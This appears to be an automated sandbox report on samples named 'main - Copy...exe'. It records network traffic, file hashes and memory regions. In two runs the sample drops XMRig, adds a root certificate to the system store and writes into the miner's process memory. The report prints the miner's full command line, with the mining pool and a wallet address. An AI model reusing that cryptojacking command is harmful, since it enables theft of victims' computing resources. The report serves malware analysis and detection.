
memory/1704-67-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-68-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-69-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-70-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-71-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-72-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-73-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-74-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-75-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-76-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-77-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-78-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-79-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-80-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-81-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-82-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-83-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

memory/1704-84-0x00007FF74F6E0000-0x00007FF7501E3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:40

Platform

win10v2004-20240508-en

Max time kernel

1550s

Max time network

1563s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Network

Country Destination Domain Proto
US 23.53.113.159:80 tcp
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:30

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1809s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4692 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 4692 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/452-14-0x0000028AFF0D0000-0x0000028AFF0F0000-memory.dmp

memory/452-15-0x0000028AFF710000-0x0000028AFF730000-memory.dmp

memory/452-16-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-19-0x0000028AFF750000-0x0000028AFF770000-memory.dmp

memory/452-18-0x0000028AFF730000-0x0000028AFF750000-memory.dmp

memory/452-17-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-20-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-21-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-22-0x0000028AFF730000-0x0000028AFF750000-memory.dmp

memory/452-23-0x0000028AFF750000-0x0000028AFF770000-memory.dmp

memory/452-24-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-25-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-26-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-27-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-28-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-29-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-30-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-31-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-32-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-33-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-34-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-35-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-36-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-37-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-38-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-39-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-40-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-41-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-42-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-43-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-44-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-45-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-46-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-47-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-48-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-49-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-50-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-51-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-52-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-53-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-54-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-55-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-56-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-57-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-58-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-59-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-60-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-61-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-62-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-63-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-64-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-65-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-66-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-67-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-68-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-69-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-70-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-71-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-72-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-73-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-74-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-75-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-76-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-77-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-78-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-79-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-80-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-81-0x00007FF604490000-0x00007FF604F93000-memory.dmp

memory/452-82-0x00007FF604490000-0x00007FF604F93000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:34

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2268 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 2268 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
